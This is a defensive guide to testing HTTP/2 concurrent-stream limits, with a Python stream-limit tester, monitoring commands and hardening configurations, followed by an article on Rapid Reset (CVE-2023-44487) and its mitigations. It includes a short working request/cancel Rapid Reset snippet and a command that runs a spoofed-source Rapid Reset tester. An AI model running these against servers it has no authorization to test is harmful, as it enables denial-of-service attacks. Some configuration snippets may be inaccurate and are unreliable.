Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.
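
For a quick check before running the full tester below, a minimal sketch like this (assuming the h2 library from section 4.1; the hostname is a placeholder) connects, reads the server's SETTINGS frame, and prints the advertised value:

import socket
import ssl

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RemoteSettingsChanged
from h2.settings import SettingCodes

HOST = "example.com"  # placeholder: replace with your own host

ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2"])
sock = ctx.wrap_socket(socket.create_connection((HOST, 443), timeout=10),
                       server_hostname=HOST)

conn = H2Connection(H2Configuration(client_side=True))
conn.initiate_connection()
sock.sendall(conn.data_to_send())

# The server's SETTINGS frame normally arrives in the first read; a more
# robust client would loop until it sees RemoteSettingsChanged.
for event in conn.receive_data(sock.recv(65536)):
    if isinstance(event, RemoteSettingsChanged):
        changed = event.changed_settings.get(SettingCodes.MAX_CONCURRENT_STREAMS)
        if changed is not None:
            print(f"Advertised MAX_CONCURRENT_STREAMS: {changed.new_value}")
sock.close()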

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python library:

pip3 install h2 --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        # changed_settings maps each setting code to a ChangedSetting object;
        # the integer we care about is its .new_value attribute.
        for setting, changed in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)
            new_value = changed.new_value

            if self.verbose:
                print(f"  Server setting: {setting_name} = {new_value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = new_value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {new_value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
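            # Note: the h2 library itself may refuse to open streams beyond the
            # peer's advertised limit (raising TooManyStreamsError, a subclass
            # of ProtocolError), so failures caught here can reflect client-side
            # enforcement rather than the server's behaviour.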
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 130
  Batch size: 10
============================================================

Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections. Note: the older http2_recv_timeout,
    # http2_idle_timeout, http2_max_field_size and http2_max_header_size
    # directives are obsolete since Nginx 1.19.7; the generic directives
    # below cover the same ground.
    client_header_timeout 10s;
    keepalive_timeout 30s;
    large_client_header_buffers 4 16k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

global
    # Cap concurrent streams per HTTP/2 connection
    tune.h2.max-concurrent-streams 100

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit concurrent connections per source IP
    stick-table type ip size 100k expire 30s store conn_cur
    http-request track-sc0 src
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests (a minimal wrapper is sketched after this list)
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing
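
A minimal automation wrapper for the weekly check might look like the following sketch. It shells out to the tester script from section 4 and flags any host whose output reports that enforcement was not detected; the host list and alerting are placeholders:

import subprocess

HOSTS = ["example.com"]  # replace with your own endpoints

for host in HOSTS:
    # Run the stream limit tester and capture its report
    proc = subprocess.run(
        ["python3", "http2_stream_limit_tester.py", "--host", host],
        capture_output=True, text=True, timeout=300,
    )
    if "Stream limit enforcement: NOT DETECTED" in proc.stdout:
        print(f"ALERT: {host} did not enforce its advertised stream limit")
    else:
        print(f"OK: {host}")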

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).
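
A hedged sketch of that modification inside the script's connect() method, for lab use against self-signed certificates only:

# Replace the strict TLS setup in connect() with a relaxed context.
# Never use this against endpoints whose identity you need to trust.
context = ssl.create_default_context()
context.check_hostname = False        # skip hostname verification
context.verify_mode = ssl.CERT_NONE   # skip certificate chain verification
context.set_alpn_protocols(['h2', 'http/1.1'])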

Error: “h2 library not installed”

Install the required library:

pip3 install h2 --break-system-packages

Error: “Connection refused”

Verify the port is open (recent macOS releases no longer ship telnet, so use nc):

nc -vz example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.

This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS

Introduction

In August 2023, a critical zero-day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2-capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE-2023-44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR-based source IP address spoofing.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request/cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
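
To make the mechanism concrete, here is a minimal, hedged sketch of the request/cancel pattern at the HTTP/2 layer using the h2 library. It assumes an already-established H2Connection named conn and a connected TLS socket named sock (set up as in the stream-limit tester earlier in this guide), and should only be run against servers you are authorized to test:

from h2.errors import ErrorCodes

headers = [
    (':method', 'GET'), (':path', '/'),
    (':scheme', 'https'), (':authority', 'example.com'),
]

stream_id = 1
for _ in range(100):
    conn.send_headers(stream_id, headers)            # open the stream
    conn.reset_stream(stream_id, ErrorCodes.CANCEL)  # cancel it immediately
    stream_id += 2                                   # client streams use odd IDs
sock.sendall(conn.data_to_send())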

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server-side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2-capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
client_header_timeout 10s;

# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10

# HAProxy configuration
global
    tune.h2.max-concurrent-streams 100

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    stick-table type ip size 100k expire 30s store http_req_rate(10s)
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi-layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Recent Nginx releases detect and limit excessive HTTP/2 stream resets
# internally; http2_max_field_size and http2_max_header_size are obsolete
# in current versions, so rely on the explicit stream cap instead
http2_max_concurrent_streams 100;
keepalive_requests 1000;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider Disabling HTTP/2 (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
